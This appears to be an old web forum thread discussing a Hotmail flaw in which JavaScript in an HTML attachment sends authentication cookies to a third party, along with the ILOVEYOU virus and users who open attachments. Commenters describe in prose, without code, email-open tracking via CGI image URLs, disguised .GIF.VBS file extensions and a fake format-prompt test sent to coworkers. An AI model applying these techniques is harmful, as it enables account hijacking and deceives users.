Oh, yes. I've actually suggested we do something similar at our company. We send out HTML emails to our customers. The URL in the IMG tag doesn't have to be an image at all--it can be a CGI page which redirects to an image. Throw a couple of parameters (like a user-id) into the URL, and the CGI page can record exactly when users open the email. Nifty, eh? I never thought of capturing the IP address directly (not something we're interested in) but it would obviously be possible.
Wonder if this could be exploited further?
Why would anyone in their right mind let unknown people run foreign code on their machines? Yes, I get executable attachments sometimes myself, but why would I want to run code that does who knows what? I guess I just know too much about the kind of people out there. Yeah, maybe that's it.
Just goes to show, once again, that there are two kinds of people in the computer world -- those who know what they're doing and understand the technology, and those who are along for the ride and depend completely on their "gurus" for anything even the slightest bit off the routine.
I have to rant a little about this because around here 9 times out of 10 people come to me to bail them out when they screw something up, and only one of my jobs pays me for that. I have very little trouble believing that quite a few people would answer "yes" to your question, and not much more trouble believing that they would come whining to more clueful people about getting their files back afterwards.
("No, you don't understand. You FORMATTED the hard drive. That ERASES the hard drive. Unless you backed up those files which were ON the hard drive, they're gone. Sorry
73 de N5VB (ex-KD5BIV) AR SK
So I just tried to send a message through hotmail, and I got a 404-ish error. So I logged back in to Hotmail and later got a message while refreshing saying that the server holding my account was temporarily unavailable. Sounds like they're taking the machines offline to throw in a patch.
I'm hella pissed, though, because the mail I was sending was to a headhunter I've been talking with about a sweet Linux job and I don't know if it went through or not.
It's enough to make a person switch over to PEmail. Old habits die hard, though. I've been using Hotmail since before M$ bought them.
-carl
. We've got computers, we're tapping phone lines, you know that ain't allowed - Talking Heads, "Life During Wartime"
I wrote a little "application" that was a simple little dialog box that asked the user if he wished to format the hard drive (in so many words) to see just how many of our in-house users really read those messages - and attached it to an email sent to everyone in the office (around 150 users). (Results were then sent to my computer through TCP connection, for those interested) 1 out of 3 users clicked yes..
Like the Dilbert comic where the boss becomes irate at a statistic that 40% of sick days are on Monday and Friday.
*gasp*!
Pablo Nevares, "the freshmaker".
Pablo Nevares, "the freshmaker".
Microsoft is announcing it as an undocumented feature, not a security hole...
kwsNI
"If you tell a man that there are millions of stars in the sky, he'll believe you. If you caution a man about wet paint, he'll have to touch it before he'll believe you."
You can remind people ad nauseum that you shouldn't execute programs attached to e-mails because they might contain viruses. Most won't remember or believe you until they experience a virus infection for themselves.
--
If a tree fell on a florist, and nobody was around to hear it, would he make a noise?
Sean Shannon
Sean Shannon
Proprietor and Editor-in-chief,
the next step is a worm that affects web discussion forums. i wouldn't be at all surprised if slashdot was its main target, just because of slashdot's size and the fact that javascript's security model is messed up on all browsers.
--
The shareholder is always right.
yes. I too was suprised that the poster apparently had failed to read the article.
Now that has to be the height of laziness
Alan Cooper in About Face characterizes the message box as "arguably the most abused part of the graphic user interface." As he states later in the book, confirmation messages "only work when they are unexpected." The answer isn't to make the users do even more work to get past these useless messages, but for programmers to stop forcing the users to click through endless dialog boxes to perform the simplest tasks.
I'm not an actor, but I play one on tv.
From the page, this seems to be an unfriendly JavaScript exploit, not Visual Basic Script, and pretty different from ILOVEYOU.
Scientia est Potentia.
It doesn't actually do many of the horrible things associated with the ILOVEYOU crap, but it will let someone else commandeer your hotmail account.
A quick summary: javascript in a rogue cookie on a hostile site tells Hotmail to send its own cookies to someone else. Once that person has those cookies, he has all the authentication he needs to use/abuse the original person's Hotmail account.
"If one is really a superior person, the fact is likely to leak out without too much assistance" -- John Andrew Holmes
I can tell that a good many of you have had the experience of explaining how, say, a hard drive works and seeing your co-worker's (or parents, great aunt, 3rd grade teacher, manager, etc.) eyes glaze over and their heads nod listlessly. To tell the truth, most people I have run into are scared of doing something wrong. Won't even open one up to put in a stick of RAM. "It's for the professionals to do" they say (and then they gladly pay someone at the local office supply store to do it for some ungodly sum.)
I think it is the job of the techies to be proactive and protect those "lusers" as much as possible. Go ahead, slam MS as much as you want, but if you're expecting for that lawyer or doctor or insurance adjuster whose computer you just worked on to be cognizant of the dangers of clicking on an attachment, don't hold your breath.
After all, how many of you know enough about your car to dispute your mechanic's diagnosis of that funny sound you hear when you put on the brakes? It's for the professionals to do, correct?
This is another view of the world.
good point.
--
The shareholder is always right.
I'm suprised it was that low. There are ALOT of stupid people out there.
By turning on their SPAM protection and having it go directly into my trash, I have received probably one piece of spam in the past month, and I have everything going into this account, I use it for posts on usenet, and regular mail still goes through... it's very very nice... They really have cleaned up their act...
fslg503-985-8686503-985-8686503-985-8686503-985-8
Free music from Jack Merlot.
including both median and mean. Anyway, because intelligence isn't really something you can put a real number to, we're free to fake a nice balanced bell curve where the median and the mean are the same. I think it works out that way with I.Q.
You're right of course (and I realized my mistake moments after submitting). s/in cookie/on website/i.
"If one is really a superior person, the fact is likely to leak out without too much assistance" -- John Andrew Holmes
Actually, as other posters have already told you, half of the population is dumber than the median, not the average.
The interesting thing is that MORE than half is dumber than the average Joe: the lower tail of the distribution "saturates" on 0 IQ, while there is no limit on higher than average IQs.
Put it another way, with very few exceptions, noone can be dumber than mud (IQ 0) while there will be few(?) more than twice as smart as our beloved Joe!
And by looking at what CmdrTaco wrote up there, he's been hitting the bottle early this morning.
Could this also affect Yahoo or other web-mail services? Or just Hotmail because of the specific kind of info they keep in their cookies?
Users have become so numb to the pop-up dialog "Click Yes/OK to continue" that they are no longer a fully effective tool in GUI design. Time to think up something that will not provoke a knee-jerk reaction every time it pops up. I admit it, when I'm in a hurry, I click "OK" as soon as I see it, too.
How many non-geeks do you think are aware of this choice at all, let alone what it means?
From they way this story is worded, I'm led to belive that you could construct a similear javascript to get the cookies from anywebsite.
Just one more reason that I only use crashscape (Which is what I've been calling that program since 1.1 when I first saw it) with sites I trust. Mostly my bank because they require javascript for some reasons (at least to log in, once I'm logged in I've disabled it with no problems, but that is a pain)
What alot of us forget, is that Windows 95 defaults to not showing the extension for files it knows the type of. So if you name a file NIFTY_PICTURE.GIF.VBS, alot of non technical people will see it as NIFTY_PICTURE.GIF. But when they double click it, it runs...
(Win98 may default to this too, I don't remember)
I suspect lots of nongeeks leave it at the default...
Use the Preview Button! Don't forget to Preview before posting!! Thanks!!!
The luser types away, giving its username and easily guessable password...
Luser: "Oh, look -- my fiance sent me an email. How do I know? It's entitled, 'ILOVEYOU'. I guess she doesn't use spaces. btw, what's with this .VBS file?"
Another luser gets flooded with 50 or so of these email from all of the luser's friends and family.
Luser: "Wow -- advertizing! I should look at one of these! Oh, what's this? Two files, one with the extention .EXE, and the other with the extension .VBS! WOW!"
Talk about ".DUM"...geez, will lusers ever learn?
Karma whorin' since 1999
ok, who does this, huh?
the same people who click 20 times to open an email cause they have so much sh!t open. Then they wonder why they have so many copies of it open...they don't know how many times to click when they are told to "double-click".
"Leave the gun, take the canoli."
this is just a placeholder till i send back my real sig from the future.
Hmm..speaking of stupid. You forgot to tell me what i mean. Also, i was not aware that the *nix dict command was the be all end all when it comes to english words. Ain't wasn't in the dictionary for a long time either, but that didn't stop people from using it.
I'm sure that pretty much everyone here has or has had a Hotmail account at some point in the past. Quick poll: How long did you use Hotmail, and why did you finally give it up?
Got Rhinos?
People are lazy and don't consider the ramifications of what they do. This puts more burden on programmers to protect idiots from themselves.
There are many alternatives to Outlook Express (in the case of the love bug) or Hotmail, but people that are too lazy to properly evaluate the suitability and safety of their tools will get hurt. This happens with physical tools
That taiwanese-brand hammer is way more likely to split and send shards into your eye, but is that your fault or the manufacturers fault? In the US, it is of course entirely the manufacturer's. In the UK, well, the judge would make an arbitrary partition and say it was maybe 60% the manufacturers fault, and 40% mine. Of course the UK approach is much less sane.
Thanks for the tip. I have now created just such a folder. It never ceases to amaze me who opens these things and ends up hosing-up my entire day cleaning up the mess. And then once they know they are busted they don't want you to tell anyone they opened it. more advice for dealing with dip$hit coworkers? We all have a lot of 'em.
I need to moderate this up. No wait, it has to be a lie, 33% of human kind _can't_ be that stupid. :/
--
"Oppression and harassment is a small price to pay to live in the land of the free." -- Montgomery Burns.
How's "resetting the filesystem" for a name?
Will I retire or break 10K?
I normally use Hotmail through Outlook Express (no flames please; my filename extensions are not hidden). When I get a spammer, I just report her.
Will I retire or break 10K?
No that's for 2n"d posters
There is an analog in meatspace warning lables. Due to lawsuits, warning lables on all sorts of products have become small books. The few usefull messages are lost in the clutter. Have you read all the warnings on your step ladder? No, you just used it. The one or two sensible warnings were lost in a blizzard of BS about pregnant woment not opperating heavy machinery.
Conditioned like a rat.
The people who open these are the same people who ran the Elf Bowling game a few months ago.
How do you know that the game came from Nordstrom's (I believe that was the company) when the damn thing isn't even signed with a legitimate certificate. It is attachments like these that ease people's minds into thinking that only good can come from opening foreign attachments.
The next time I see garbage like this without a legit certificate I'm giving them a piece of my mind.
Agreement. Of course, I wouldn't be surprised if the sandbox implementation in the Visual J++ "Virtual Machine" has a bunch of holes in it. Just seems par for the course...
Blar.
(ok, who does this, huh? I mean, viewing a gif or clicking a URL, but running a strange program? The mind boggles).
If I read the attack information right, the user would see an HTML file.. to many, just another web site. Now, even if it wasn't such, who would press on and get zapped?
Likely the click-happy, who don't see an odd extension as one or such, but just click reflexively, as they've always done. One more reason I loathe attachments. (I was getting emails at work that were just attachments, no explanation, not even a sbject. Someone got offended when I replied "Deleted: Unread, not important enough for sender to identify, not important enough to read.")
Microsoft/HotMail? Yes, left a door unlocked. They really should lock it properly. But an unlocked door doesn't get opened by itself.
Some crackerd00d wannabe? Yes, that person opens the door, or at least puts up the sign on it suggesting that it be opened. But even this person hasn't done the real damage.
The first two set up conditions for the rest. The ones who don't see what they look at and just click, just like always, not pausing to inspect.
There was(is) a hole, and someone has exploited it... but, in the recent "LoveBug" case, there were a surprising number of accomplices all over the globe.
I don't subscribe to RMS's GNUtopian vision.
Most people wouldn't think twice about opening a snail mail package addressed to them, even if it has not return address on it, and seems somewhat heavy. That's why the unabomber managed to rack up a pretty decent string before being caught. People don't tend to think that bad things will happen to them when they are using tools that they deal with everyday without understanding.
To put it another way, while most people think of themselves as fairly decent drivers, how often in the past week have you been cut off, or had the guy in front of you make a turn without signalling? People get so used to using tools that they become careless; this is compounded if the person doesn't understand how the tool that they are using works, or at least had it drilled into their heads the way to safely use the tool.
It's just a matter of time before people get more careful about opening things they're not sure are safe. I imagine Thag got a lot more careful with fire after watching Thog torch himself.
"This is your world. These are your people. You can live for yourself today, or help build tomorrow for everyone."
I hate HTML formatted messages. Basic tags are ok (like bold, italic), but I really don't like colors. I often get emails with black text on a dark background, or yellow text on a white background. Plain text is easier for me to read, and uses less bandwidth.
Slightly off-topic -- non-hotmail point, about OE:
;-P
I'm running OE on the Mac laptop, only because of one key feature it has, and just switched back to it from Mailsmith, actually.
The feature was the ability of it to automatically detect what proxy settings to use with my home Wingate machine without having to adjust anything in OE itself. I haven't seen another program be able to do that. I just tell the Mac about my Proxy IP, OE (and IE, for that matter) sense the configuration change in the Apple system files and adjust appropriately. No manual, or otherwise, adjustments needed in my browser or mail client needed!
But, now I'm a little concerned about OE, even though it doesn't speak VBscript on the Mac, because other malicious content can be sent to it. I'd say it's running 60/40 on the PC only vs. Mac,too OE bug effectiveness meter. Don't quote me on that...
Has anyone seen a Mac mail client that is that versatile, eh? I think not. But OE also scares me, none-the-less. I'd use Linux, but our foreign language translation business really demands the use of a Mac, believe it or not.
Comments and thoughts, and suggestions of other mail clients are welcome and invited...
-- I lived through the IPO Rush of '99
Contrary to the reporting on /., the most recent Hotmail hole is in no way related to a VBS script. What's so alarming about the hole is that it is acutally an HTML file which contains the exploit. More specifically:
The folks over at Hotmail were smart enough to filter out JavaScript from HTML formatted messages sent to Hotmail recipients. They did not, however, think that it would be necessary to filter HTML attachments, either. As a result, a clever individual was able to construct an HTML page containing JavaScript which forwards HotMail authorization cookies to a third party.
Ironically, this information is largely reproduced from the article on Peacefire cited in the original post. No mention of VBS files anywhere.
And don't forget it did have a txt in there. And if you save it to the desktop first, it looks like a text file. windows by default hides the file extension, which in this case is vbs, so you are left with just .txt. And have you seen the vbs icon? It looks like a scroll.
Lastly, if you get something in your real mail that you look at and say wtf? wouldn't you open it? (yeah, yeah, yeah, not if it looked like a bomb, right?)
And I'm kind of surprised there aren't more trojaned joke email programs. Those things get sent around like no tomorrow if they're funny enough (and some, uh, less so)... remember elf bowling? the combo#5 flash program? that fucking cat that walks around on the desktop... In other words, people are just plain used to viewing and running attachments in most settings.
This one can't be blamed on VBS -- JavaScript was used for this exploit. Since Hotmail requires JavaScript, this means that all users -- not just those with Windows -- could have been victimized by this exploit.
This one could impact other web-email sites.
ObBias: Email shouldn't be in HTML, let alone have embeded scipts...strip it all folks!
A firewall can not protect you from yourself. Turn off what you do not need. Do not use the firewall to do your work.
Unfortunately everyone at my work. Which leads me to believe that virii will always be a problem. We all know that windows is really bad for security, but I don't think your average human can handle multiuser OS's. The few people here that have switched to win2000 always insist that they have administrative rights to their computer and I don't blame them. The only unix platform I think most of these people can handle is BeOS which is in essence is a single user OS. I think we are doomed to dealing with these virii for as long as we have personal computers as we know them.